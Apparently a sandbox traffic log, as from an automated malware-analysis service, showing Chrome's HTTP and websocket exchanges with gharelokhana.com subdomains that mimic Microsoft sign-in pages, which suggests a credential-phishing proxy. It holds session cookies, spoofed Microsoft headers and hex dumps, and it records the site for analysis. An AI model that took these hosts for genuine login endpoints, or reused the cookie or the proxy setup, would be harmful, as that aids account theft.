                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: pKuI03QTsSX4tFr4lzWD4A==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:01 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:01 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 6bd0b468-503d-4678-8aef-df1fc7e10c00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - SEC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                44192.168.2.849825164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:02 UTC554OUTGET /shared/1.0/content/images/signin-options_3e3f6b73c3f310c31d2c4d131a8ab8c6.svg HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:25:03 UTC800INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:03 GMT
                                                                                                                                                                                                Content-Type: image/svg+xml
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Wed, 24 May 2023 10:11:49 GMT
                                                                                                                                                                                                etag: 0x8DB5C3F49ED96E0
                                                                                                                                                                                                x-ms-request-id: 48635b47-101e-0074-558c-46c80b000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072503Z-15d6f6465c8dwrslhC1DUSq28s00000001sg00000000120n
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:25:03 UTC628INData Raw: 32 36 64 0d 0a 1f 8b 08 00 00 00 00 00 00 ff 7d 55 4d 6f 22 31 0c fd 2b a3 d9 ab 93 c9 f7 47 3b 20 cd 9e 38 6c af 1c b8 4d 0b 05 24 0a 55 19 41 57 ab fe f7 b5 93 a0 55 61 58 0d d8 60 27 ef 3d db 09 b4 c7 d3 ba fa 7c db ed 8f 93 7a 33 0c ef 0f 4d 73 3e 9f f9 59 f3 c3 c7 ba 51 42 88 06 57 d4 d5 79 bb 1c 36 93 da 84 ba da ac b6 eb cd 90 3f 9f b6 ab f3 cf c3 e7 a4 16 95 a8 4c c0 57 3d 6d 97 ab d7 e3 b4 3d 0e bf 77 ab 29 ef ff bc 6e 77 bb 87 fd 61 bf 7a fc e2 cf f9 db 0f 23 e8 79 fc 6a 9b bc ac 6d f2 a6 8f d5 cb 50 bd ec fa 23 ca e9 ef b1 36 d3 f6 bd 1f 36 97 75 cf 75 b5 9c d4 4f 46 80 56 dc fa 30 37 62 a6 d5 5c bb 99 0a 73 ad 66 ca cc 55 e0 de b9 4e 0a ee 42 84 e2 04 3e 12 64 04 2d 7a 0c a5 78 89 32 cb ad f1 4c 72 0b 52 72 29 dc c5 e5 ac e2 4a 46 cc 7a 19 3b
                                                                                                                                                                                                Data Ascii: 26d}UMo"1+G; 8lM$UAWUaX`'=|z3Ms>YQBWy6?LW=m=w)nwaz#yjmP#66uuOFV07b\sfUNB>d-zx2LrRr)JFz;
                                                                                                                                                                                                2024-12-05 07:25:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                45192.168.2.849826164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:02 UTC575OUTGET /shared/1.0/content/js/asyncchunk/convergedlogin_pstringcustomizationhelper_4285088f1dbaf52a876d.js HTTP/1.1
                                                                                                                                                                                                Host: 82ce8558-5bf3911d.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="
                                                                                                                                                                                                2024-12-05 07:25:04 UTC806INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:04 GMT
                                                                                                                                                                                                Content-Type: application/x-javascript
                                                                                                                                                                                                Content-Length: 35203
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                cache-control: public, max-age=31536000
                                                                                                                                                                                                last-modified: Thu, 15 Aug 2024 17:52:55 GMT
                                                                                                                                                                                                etag: 0x8DCBD5317AEB807
                                                                                                                                                                                                x-ms-request-id: 8dc1112b-701e-0010-5da0-463993000000
                                                                                                                                                                                                x-ms-version: 2009-09-19
                                                                                                                                                                                                x-ms-lease-status: unlocked
                                                                                                                                                                                                x-ms-blob-type: BlockBlob
                                                                                                                                                                                                access-control-expose-headers: x-ms-request-id,Server,x-ms-version,Content-Type,Content-Encoding,Cache-Control,Last-Modified,ETag,x-ms-lease-status,x-ms-blob-type,Content-Length,Date,Transfer-Encoding
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                x-azure-ref: 20241205T072503Z-15d6f6465c8dk6rvhC1DUSu8gc00000000r000000000nr7b
                                                                                                                                                                                                x-fd-int-roxy-purgeid: 0
                                                                                                                                                                                                x-cache: TCP_HIT
                                                                                                                                                                                                accept-ranges: bytes
                                                                                                                                                                                                content-encoding: gzip
                                                                                                                                                                                                2024-12-05 07:25:04 UTC15578INData Raw: 1f 8b 08 00 00 00 00 00 00 03 c4 bd 6b 43 db 48 b2 30 fc fd f9 15 e0 9d 65 ac b5 00 df 30 18 70 58 06 92 49 76 33 93 9c 5c 66 cf 2e 30 59 59 96 6d 0d b2 65 24 99 4b 02 cf 6f 7f eb d2 97 6a c9 90 cc 9c 67 df 33 e7 6c 70 57 df aa ab ab ab ab aa ab 5b db 7f 59 ff 3f 6b 7f 59 db fc f6 ff d6 de 7f 38 7e f7 61 ed cd 8b b5 0f 2f 5f bd 3b 5d 7b 0b a9 7f ae fd fc e6 c3 ab 93 e7 df de 0e 76 8a ff fb 30 8d f3 b5 71 9c 44 6b f0 77 18 e4 d1 68 2d 9d af a5 d9 5a 3c 0f d3 6c 91 66 41 11 e5 6b 33 f8 37 8b 83 64 6d 9c a5 b3 b5 62 1a ad 2d b2 f4 b7 28 2c f2 b5 24 ce 0b a8 34 8c 92 f4 66 ad 0e cd 65 a3 b5 b7 41 56 dc ad bd 7a eb 6d 41 fb 11 b4 16 4f e2 39 d4 0e d3 c5 1d fc 9e 16 6b f3 b4 88 c3 68 2d 98 8f a8 b5 04 12 f3 3c 5a 5b ce 47 51 b6 76 33 8d c3 e9 da 4f 71 98 a5 79
                                                                                                                                                                                                Data Ascii: kCH0e0pXIv3\f.0YYme$Kojg3lpW[Y?kY8~a/_;]{v0qDkwh-Z<lfAk37dmb-(,$4feAVzmAO9kh-<Z[GQv3Oqy
                                                                                                                                                                                                2024-12-05 07:25:04 UTC16384INData Raw: 5a 27 f8 ef 29 66 ec 36 5f c0 bf 7b cf db e7 cb d6 5e f3 39 39 c4 7e d8 a4 3f 2f f0 df f6 31 25 da 94 d3 6b 52 82 1f fb eb f5 38 01 c5 5e 3c 7f 81 ff be 78 d1 df a4 3f 3f 5c dc 9f 2f 4f c1 50 38 83 3f 27 3f 9c e2 bf 27 a7 0c 6c bf 20 e0 31 36 05 7f 3a 0c ed 50 d1 d3 dd ce 26 fd 39 26 e8 0f dd 26 95 6d b6 f0 df 36 d7 d8 7d 71 b1 4d a3 6e 7f 8d a8 34 0f af e3 f9 e5 eb 60 18 25 4c c7 0e 12 cf 64 9c 46 79 11 cf e9 d1 06 ce ee 3a d9 1f e2 22 89 38 63 87 29 dd f9 fd 86 81 f5 0f 1a c3 1d f7 a8 90 94 f1 fc a7 e0 16 94 3d fa 49 a2 98 7e 0d d0 42 9f 0f 5a 07 94 3a 0c 0f 88 0d fb 1d 90 fd a0 60 00 7b 67 a1 94 ab 54 0a b7 32 f4 1e 6e 6e ce bd 2f b8 bd 2b 09 06 15 63 6e 1f 58 7c 36 02 99 80 ef 21 6c e5 97 f1 e2 43 7a 19 e1 72 f3 fb b8 db a5 1e 15 1d 70 e1 cd 96 37 6f
                                                                                                                                                                                                Data Ascii: Z')f6_{^99~?/1%kR8^<x??\/OP8?'?'l 16:P&9&&m6}qMn4`%LdFy:"8c)=I~BZ:`{gT2nn/+cnX|6!lCzrp7o
                                                                                                                                                                                                2024-12-05 07:25:04 UTC3241INData Raw: b2 a0 e0 8b 8b 70 03 1f 2f 3b af cc 59 7e f0 78 ef 41 c4 51 45 bf fd 06 54 22 09 3f 2c e1 74 75 58 56 49 f7 ba 9f 47 6d 03 0a 5a 85 8d 63 9b 31 92 72 8e a4 a2 fd 7a db c3 9c d7 fe d6 74 7a b2 ee f6 eb 69 89 47 95 d2 71 e6 19 2a 1e 34 14 88 bf 04 4f 60 7a 80 b3 a1 cc ef d6 a6 f3 a8 f0 c8 cb b0 45 86 d4 64 ff 46 96 bb 3b 19 c7 74 03 9a bb c8 a2 95 77 76 ba 0c f8 c6 5d 7e 3d 0a f6 86 ec 70 f3 96 3d 0a ef 1d 6d 76 38 74 63 36 64 ea f5 13 7a 9d 58 8f a6 34 51 c4 c5 92 a2 37 7a 3f f6 ca ea 70 45 15 10 94 a9 aa e2 1c 6d ab f1 97 6a eb da a8 37 ab b5 2a 53 4f 08 e1 8d 5a bb c9 c2 1b f5 72 b9 89 e1 f4 32 7c 6e b0 df 0b bc 13 c0 af 5a 2c 84 65 2e 53 c6 16 fa 75 52 d7 2b 22 f4 1a c5 54 f5 30 a9 5e 69 52 90 5e 6f ab 68 7b c8 ea e9 3a da 6c d1 55 f6 2f a1 35 83 0c c2
                                                                                                                                                                                                Data Ascii: p/;Y~xAQET"?,tuXVIGmZc1rztziGq*4O`zEdF;twv]~=p=mv8tc6dzX4Q7z?pEmj7*SOZr2|nZ,e.SuR+"T0^iR^oh{:lU/5


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                46192.168.2.849827164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:03 UTC559OUTGET /common/instrumentation/dssostatus HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Accept: */*
                                                                                                                                                                                                Sec-Fetch-Site: none
                                                                                                                                                                                                Sec-Fetch-Mode: cors
                                                                                                                                                                                                Sec-Fetch-Dest: empty
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                2024-12-05 07:25:04 UTC866INHTTP/1.1 200 OK
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:03 GMT
                                                                                                                                                                                                Content-Type: application/json; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: no-store, no-cache
                                                                                                                                                                                                pragma: no-cache
                                                                                                                                                                                                access-control-allow-origin: https://5088df79-5bf3911d.gharelokhana.com/
                                                                                                                                                                                                access-control-allow-credentials: true
                                                                                                                                                                                                access-control-allow-methods: POST, OPTIONS
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 132f244b-39e7-4a5f-aeac-3fee47900d00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                2024-12-05 07:25:04 UTC170INData Raw: 61 34 0d 0a 7b 22 65 72 72 6f 72 22 3a 7b 22 63 6f 64 65 22 3a 36 31 30 30 2c 22 73 74 73 45 72 72 6f 72 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 2c 22 63 6f 72 72 65 6c 61 74 69 6f 6e 49 64 22 3a 22 30 62 33 35 38 35 38 66 2d 61 64 38 66 2d 34 63 36 64 2d 39 36 33 65 2d 32 63 30 63 33 63 61 62 32 62 36 38 22 2c 22 74 69 6d 65 73 74 61 6d 70 22 3a 22 32 30 32 34 2d 31 32 2d 30 35 20 30 37 3a 32 35 3a 30 33 5a 22 2c 22 6d 65 73 73 61 67 65 22 3a 22 41 41 44 53 54 53 39 30 30 35 36 31 22 7d 7d 0d 0a
                                                                                                                                                                                                Data Ascii: a4{"error":{"code":6100,"stsError":"AADSTS900561","correlationId":"0b35858f-ad8f-4c6d-963e-2c0c3cab2b68","timestamp":"2024-12-05 07:25:03Z","message":"AADSTS900561"}}
                                                                                                                                                                                                2024-12-05 07:25:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                47192.168.2.849838164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:08 UTC731OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: SzkEBxFnDrbAW8ZJfQXPHQ==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:09 UTC743INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:09 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: b6dff307-74e4-4260-b77d-a31814300a00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:09 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                48192.168.2.849861164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:19 UTC731OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: NJjrd1Wyk2YdfBgR/4U5WA==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:20 UTC740INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:19 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 4cffd087-8a4a-487d-ac0a-b13f98949b01
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - FRC ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:20 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                49192.168.2.849889164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:31 UTC731OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; SSOCOOKIEPULLED=1; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: 8IUm0HYxC7F0Pubj0TCIAg==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:32 UTC743INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:32 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 3309dc19-c186-4179-b53d-0dff4cc90e00
                                                                                                                                                                                                x-ms-ests-server: 2.1.19568.3 - WEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:32 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                50192.168.2.849921164.92.191.864436484C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                2024-12-05 07:25:45 UTC712OUTGET /5bf3911d69954dcc9f26274a1117b6fd/ HTTP/1.1
                                                                                                                                                                                                Host: djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Connection: Upgrade
                                                                                                                                                                                                Pragma: no-cache
                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                Upgrade: websocket
                                                                                                                                                                                                Origin: https://djdjkdlellekkff.gharelokhana.com
                                                                                                                                                                                                Sec-WebSocket-Version: 13
                                                                                                                                                                                                Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                Cookie: zQt4SK="NWJmMzkxMWQtNjk5NS00ZGNjLTlmMjYtMjc0YTExMTdiNmZkOmFkNmQ3ZGY4LWUzYzQtNDRhZS1hNDVhLWFkMzBkMDQ3NTIzNg=="; AADSSO=NA|NoExtension; brcap=0
                                                                                                                                                                                                Sec-WebSocket-Key: 3gu1mlhK/I6QVYN1Ldc5tQ==
                                                                                                                                                                                                Sec-WebSocket-Extensions: permessage-deflate; client_max_window_bits
                                                                                                                                                                                                2024-12-05 07:25:46 UTC743INHTTP/1.1 404 Not Found
                                                                                                                                                                                                Server: nginx
                                                                                                                                                                                                Date: Thu, 05 Dec 2024 07:25:46 GMT
                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                Connection: close
                                                                                                                                                                                                Vary: Accept-Encoding
                                                                                                                                                                                                cache-control: private
                                                                                                                                                                                                p3p: CP="DSP CUR OTPi IND OTRi ONL FIN"
                                                                                                                                                                                                x-ms-request-id: 12e44ffb-0746-4858-b289-2a0dcd727700
                                                                                                                                                                                                x-ms-ests-server: 2.1.19492.3 - NEULR1 ProdSlices
                                                                                                                                                                                                report-to: {"group":"network-errors","max_age":86400,"endpoints":[{"url":"https://43042841-5bf3911d.gharelokhana.com/api/report?catId=GW+estsfd+SEC"}]}
                                                                                                                                                                                                nel: {"report_to":"network-errors","max_age":86400,"success_fraction":0.001,"failure_fraction":1.0}
                                                                                                                                                                                                x-ms-srs: 1.P
                                                                                                                                                                                                referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                access-control-allow-origin: *
                                                                                                                                                                                                access-control-allow-headers: *
                                                                                                                                                                                                2024-12-05 07:25:46 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                                                                                                                Data Ascii: 0


                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
